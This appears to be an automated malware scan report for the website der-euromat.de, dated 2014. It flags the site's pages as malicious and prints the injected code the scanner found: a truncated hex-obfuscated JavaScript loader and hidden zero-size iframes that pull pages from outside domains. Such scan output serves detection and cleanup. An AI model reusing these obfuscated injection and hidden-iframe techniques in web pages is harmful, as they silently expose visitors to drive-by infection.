Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=der-euromat.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://der-euromat.de/ | 200 OK Content-Length: 46896 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) urzok="spl"+"i"+"t";vbh=window;tpvdfz=(1)?"0x":"123";euo=(5-3-1);try{--(document["b"+"ody"])}catch(yedzr){kvhke=false;try{}catch(aas){kvhke=21;}
if(1){ipbnh="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a ...[1656 bytes skipped]... Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer= <iframe width='0px' height='0px' scrolling='no' marginheight='0' marginwidth='0' frameborder='0' src='http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer="+document.referrer+"&lp="+lp+"'> Malicious iFrame found. The same iFrame was found in 5 websites. size: 1x1 src: http://lfmonline.de/test/test.php This URL is marked by Google as suspicious <iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=&lp= <iframe width='0px' height='0px' scrolling='no' marginheight='0' marginwidth='0' frameborder='0' src='http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=&lp="+lp+"'> | ||
http://der-euromat.de/impressum.html | 200 OK Content-Length: 22299 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) urzok="spl"+"i"+"t";vbh=window;tpvdfz=(1)?"0x":"123";euo=(5-3-1);try{--(document["b"+"ody"])}catch(yedzr){kvhke=false;try{}catch(aas){kvhke=21;}
if(1){ipbnh="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a:69:5a:34:1e:5f:6b:6b:67:31:26:26:63:5d:64:66 Antivirus reports:
| ||
http://der-euromat.de/test404page.js | 404 Not Found Content-Length: 276 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: der-euromat.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jul 2014 01:31:38 GMT
Accept-Ranges: bytes
ETag: "4a406a-b730-4eac14cdd4580"
Server: Apache
Vary: Accept-Encoding
Content-Length: 46896
Content-Type: text/html
Last-Modified: Sat, 09 Nov 2013 16:50:46 GMT
...46896 bytes of data.
GET / HTTP/1.1
Host: der-euromat.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jul 2014 01:31:38 GMT
Accept-Ranges: bytes
ETag: "4a406a-b730-4eac14cdd4580"
Server: Apache
Vary: Accept-Encoding
Content-Length: 46896
Content-Type: text/html
Last-Modified: Sat, 09 Nov 2013 16:50:46 GMT
...46896 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: der-euromat.de
Referer: http://www.google.com/search?q=der-euromat.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: der-euromat.de
Referer: http://www.google.com/search?q=der-euromat.de
Result:
The result is similar to the first query. There are no suspicious redirects found.